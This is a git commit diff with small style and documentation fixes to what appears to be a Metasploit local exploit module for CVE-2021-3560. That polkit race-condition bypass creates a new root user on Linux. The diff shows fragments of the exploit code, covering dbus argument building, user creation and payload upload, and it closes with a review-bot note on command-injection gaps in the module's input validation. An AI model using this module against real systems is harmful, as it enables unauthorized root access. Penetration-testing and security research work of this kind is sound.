Updated docs
parent
fdbf669da2
commit
9a07039e7e
|
@ -1,6 +1,6 @@
|
|||
## Description
|
||||
|
||||
This module exploits a authentication bypass in Linux machines that make use of the polkit is a system service.
|
||||
This module exploits a authentication bypass in Linux machines that make use of the polkit system service.
|
||||
The vulnerability enables an unprivileged local user to get a root shell on the system.
|
||||
|
||||
## Vulnerable Application
|
||||
|
@ -27,15 +27,15 @@ Download and install Ubuntu 20.04 from the Ubuntu Downloads page: https://ubuntu
|
|||
**SESSION**
|
||||
The session to run this module on.
|
||||
|
||||
**WRITABLE_DIR**
|
||||
Directory to write file to (`%TEMP%` by default).
|
||||
|
||||
**USERNAME**
|
||||
The name of the user the exploit will add to the system
|
||||
|
||||
**PASSWORD**
|
||||
The password for the user to be created
|
||||
|
||||
**WritableDir**
|
||||
Directory to write file to (`%TEMP%` by default).
|
||||
|
||||
## Scenarios
|
||||
|
||||
### Tested on Ubuntu 20.04
|
||||
|
|
|
@ -42,7 +42,7 @@ class MetasploitModule < Msf::Exploit::Local
|
|||
'References' => [
|
||||
['URL', 'https://github.blog/2021-06-10-privilege-escalation-polkit-root-on-linux-with-bug/'],
|
||||
['CVE', '2021-3560'],
|
||||
['EDB', '50011'],
|
||||
['EDB', '50011']
|
||||
],
|
||||
'Targets' =>
|
||||
[
|
||||
|
@ -60,7 +60,7 @@ class MetasploitModule < Msf::Exploit::Local
|
|||
register_options([
|
||||
OptString.new('USERNAME', [ true, 'A username to add as root', 'msf' ], regex: /^[a-z_]([a-z0-9_-]{0,31}|[a-z0-9_-]{0,30}\$)$/),
|
||||
OptString.new('PASSWORD', [ true, 'A password to add for the user (default: random)', rand_text_alphanumeric(8)]),
|
||||
OptString.new('ITERATIONS', [ true, 'Due to the race condition the command might have to be run multiple times before it is successful. Use this to define how many times each command is attempted', 20])
|
||||
OptInt.new('ITERATIONS', [ true, 'Due to the race condition the command might have to be run multiple times before it is successful. Use this to define how many times each command is attempted', 20])
|
||||
])
|
||||
register_advanced_options([
|
||||
OptString.new('WritableDir', [true, 'A directory where we can write files', '/tmp'])
|
||||
|
@ -145,7 +145,7 @@ class MetasploitModule < Msf::Exploit::Local
|
|||
if exploit_set_realname(rand_text_alphanumeric(12))
|
||||
status = CheckCode::Vulnerable('The polkit framework instance is vulnerable.')
|
||||
unless exploit_set_realname(old_realname)
|
||||
print_error('Failed to restore the root user\'s orignal \'RealName\' property value')
|
||||
print_error('Failed to restore the root user\'s original \'RealName\' property value')
|
||||
end
|
||||
end
|
||||
end
|
||||
|
@ -227,9 +227,9 @@ class MetasploitModule < Msf::Exploit::Local
|
|||
cmd_args << object_path
|
||||
cmd_args << interface_member
|
||||
args.each do |arg|
|
||||
if arg.is_a? Integer
|
||||
if arg.is_a?(Integer)
|
||||
cmd_args << "int32:#{arg}"
|
||||
elsif arg.is_a? String
|
||||
elsif arg.is_a?(String)
|
||||
cmd_args << "string:'#{arg}'"
|
||||
end
|
||||
end
|
||||
|
@ -320,15 +320,15 @@ class MetasploitModule < Msf::Exploit::Local
|
|||
end
|
||||
|
||||
def upload(path, data)
|
||||
print_status "Writing '#{path}' (#{data.size} bytes) ..."
|
||||
rm_f path
|
||||
write_file path, data
|
||||
register_file_for_cleanup path
|
||||
print_status("Writing '#{path}' (#{data.size} bytes) ...")
|
||||
rm_f(path)
|
||||
write_file(path, data)
|
||||
register_file_for_cleanup(path)
|
||||
end
|
||||
|
||||
def upload_and_chmodx(path, data)
|
||||
upload path, data
|
||||
chmod path
|
||||
upload(path, data)
|
||||
chmod(path)
|
||||
end
|
||||
|
||||
def upload_payload
|
||||
|
@ -351,7 +351,7 @@ class MetasploitModule < Msf::Exploit::Local
|
|||
if exploit_set_username(loop_sequence)
|
||||
uid = cmd_exec("id -u #{datastore['USERNAME']}")
|
||||
print_good("User #{datastore['USERNAME']} created with UID #{uid}")
|
||||
print_status("Attempting to set the password of the newly create user, #{datastore['USERNAME']}, to: #{datastore['PASSWORD']}")
|
||||
print_status("Attempting to set the password of the newly created user, #{datastore['USERNAME']}, to: #{datastore['PASSWORD']}")
|
||||
if exploit_set_password(uid, create_unix_crypt_hash, loop_sequence)
|
||||
print_good('Obtained code execution has root!')
|
||||
fname = upload_payload
|
||||
|
|
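Review bot: The `USERNAME` regex in the `register_options` hunk anchors with `^` and `$`, which in Ruby match at line boundaries rather than at the ends of the string, so a value containing an embedded newline can presumably pass validation as long as one of its lines fits the pattern. That option is later interpolated unquoted into `cmd_exec("id -u #{datastore['USERNAME']}")` in the last hunk, so this validation is the only thing keeping it a single shell word. Anchor the whole string instead: `regex: /\A[a-z_]([a-z0-9_-]{0,31}|[a-z0-9_-]{0,30}\$)\z/`. The argument-building hunk has a related gap: `cmd_args << "string:'#{arg}'"` does not escape a single quote inside `arg`, and escaping it (for example with `Shellwords.escape`, if the command is run through a shell as it appears to be) would make the quoting robust. The enclosing methods start and end outside these hunks, so callers that already sanitise these values are not visible here.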